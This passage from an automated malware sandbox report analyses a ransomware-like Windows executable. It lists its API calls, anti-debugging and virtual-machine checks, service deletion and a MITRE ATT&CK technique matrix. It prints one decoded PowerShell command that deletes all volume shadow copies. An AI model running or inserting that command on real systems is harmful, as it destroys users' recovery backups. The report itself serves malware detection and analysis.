        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_001C57EA
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_004054F0 rdtsc
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle 0_2_00403839
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: OpenSCManagerW,EnumServicesStatusExW,RtlGetLastWin32Error,CloseServiceHandle,CloseServiceHandle,EnumServicesStatusExW,OpenServiceW,ControlService,DeleteService,CloseServiceHandle,CloseServiceHandle 0_2_001C3A89
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Window / User API: threadDelayed 10000
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2917
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2421
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe TID: 4356 | Thread sleep count: 10000 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5292 | Thread sleep count: 2917 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5284 | Thread sleep count: 2421 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2684 | Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5504 | Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | File Volume queried: C:\ FullSizeInformation
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_004070C1 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_001C7311 FindFirstFileExW,FindFirstFileW,FindNextFileW,FindClose
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_00404FDB GetSystemInfo
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
        Source: HAjXCphNj5.exe, 00000000.00000002.1223906621.0000000003F00000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_004054F0 rdtsc
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_00404C8C mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_00404FF2 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_001C5242 mov ecx, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_001C4EDC mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_001C092B mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_001C0D90 mov eax, dword ptr fs:[00000030h]
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_00404409 HeapCreate,GetProcessHeap
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Process token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion:

        Encrypted powershell cmdline option found
        Source: unknown | Process created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Process created: Base64 decoded Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: OpenProcess,QueryFullProcessImageNameW,PathFindFileNameW, svchost.exe 0_2_004045C2
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmp | Binary or memory string: Progman
        Source: HAjXCphNj5.exe, 00000000.00000002.1222996351.0000000001550000.00000002.00000001.sdmp, unsecapp.exe, 00000007.00000002.1221833599.000001D99FAA0000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_004046E2 cpuid
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
        Source: C:\Users\user\Desktop\HAjXCphNj5.exe | Code function: 0_2_00404D32 GetUserNameW

        Mitre Att&ck Matrix

        The matrix is listed per tactic column; the digits in parentheses after a technique are the signature-match markers printed in the report's matrix, kept as shown.

        Initial Access: Replication Through Removable Media (1); Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Spearphishing Link; Spearphishing Attachment; Spearphishing via Service; Supply Chain Compromise; Trusted Relationship
        Execution: Windows Management Instrumentation (1); PowerShell (1); Service Execution (1); Scheduled Task; Command-Line Interface; Graphical User Interface; Scripting; Third-party Software; Rundll32; PowerShell
        Persistence: Modify Existing Service (1); Port Monitors; Accessibility Features; System Firmware; Shortcut Modification; Modify Existing Service; Path Interception; Logon Scripts; DLL Search Order Hijacking; Change Default File Association
        Privilege Escalation: Process Injection (12); Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness; New Service; Scheduled Task; Process Injection; Service Registry Permissions Weakness; Exploitation for Privilege Escalation
        Defense Evasion: Software Packing (23); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); Masquerading (3); Virtualization/Sandbox Evasion (2); Process Injection (12); Connection Proxy (1); Indicator Blocking; Process Injection; Scripting
        Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation; Brute Force; Two-Factor Authentication Interception; Bash History; Input Prompt; Keychain
        Discovery: Peripheral Device Discovery (11); Account Discovery (1); Security Software Discovery (121); System Service Discovery (1); File and Directory Discovery (1); System Information Discovery (25); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1)
        Lateral Movement: Replication Through Removable Media (1); Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot; Third-party Software; Pass the Hash; Remote Desktop Protocol; Windows Admin Shares; Taint Shared Content
        Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged; Screen Capture; Email Collection; Clipboard Data; Automated Collection; Audio Capture
        Exfiltration: Data Encrypted (1); Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over Command and Control Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Physical Medium; Commonly Used Port
        Command and Control: Standard Cryptographic Protocol (2); Connection Proxy (1); Custom Cryptographic Protocol; Multiband Communication; Standard Cryptographic Protocol; Commonly Used Port; Uncommonly Used Port; Standard Application Layer Protocol; Multilayer Encryption; Connection Proxy
        Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
        Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
        Impact: Data Encrypted for Impact (1); Defacement (1); Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

        Behavior Graph

        (Behavior graph image and its legend are not reproduced in this extract.)

        Screenshots
